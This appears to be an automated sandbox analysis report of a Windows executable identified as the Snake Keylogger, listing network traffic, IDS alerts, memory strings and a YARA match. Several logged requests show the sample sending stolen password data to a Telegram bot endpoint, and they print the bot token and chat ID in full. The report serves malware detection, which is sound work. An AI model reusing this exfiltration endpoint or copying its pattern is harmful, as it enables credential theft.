Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7895118317:AAGrVh3BGkPztPIw30H4HXBbPxYmBtMiKV0/sendDocument?chat_id=5649235024&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5e665588b960Host: api.telegram.orgContent-Length: 570Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7895118317:AAGrVh3BGkPztPIw30H4HXBbPxYmBtMiKV0/sendDocument?chat_id=5649235024&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5e7c51370503Host: api.telegram.orgContent-Length: 570Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49715 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49709 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49717 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49736 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49713 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49714 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49751 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49760 -> 104.21.64.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49711 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49712 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7895118317:AAGrVh3BGkPztPIw30H4HXBbPxYmBtMiKV0/sendDocument?chat_id=5649235024&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5e665588b960Host: api.telegram.orgContent-Length: 570Connection: Keep-Alive

Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000003002000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C35000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C1A000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C43000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002B87000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C35000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C1A000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C43000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002B87000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002D41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp, uyDicX.exe, 0000000A.00000002.2125831840.0000000003D19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C35000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C1A000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C43000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002B9F000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E1E000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2091660215.0000000002D9E000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000A.00000002.2122551380.0000000002D03000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002D41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000003002000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: uyDicX.exe, 0000000E.00000002.4499608217.0000000003002000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: uyDicX.exe, 0000000E.00000002.4499608217.0000000003002000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7895118317:AAGrVh3BGkPztPIw30H4HXBbPxYmBtMiKV0/sendDocument?chat_id=5649
Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C35000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C1A000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C43000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002B87000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002B87000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000A.00000002.2125831840.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: uyDicX.exe, 0000000E.00000002.4499608217.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C35000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C1A000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C43000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$

Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49786 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
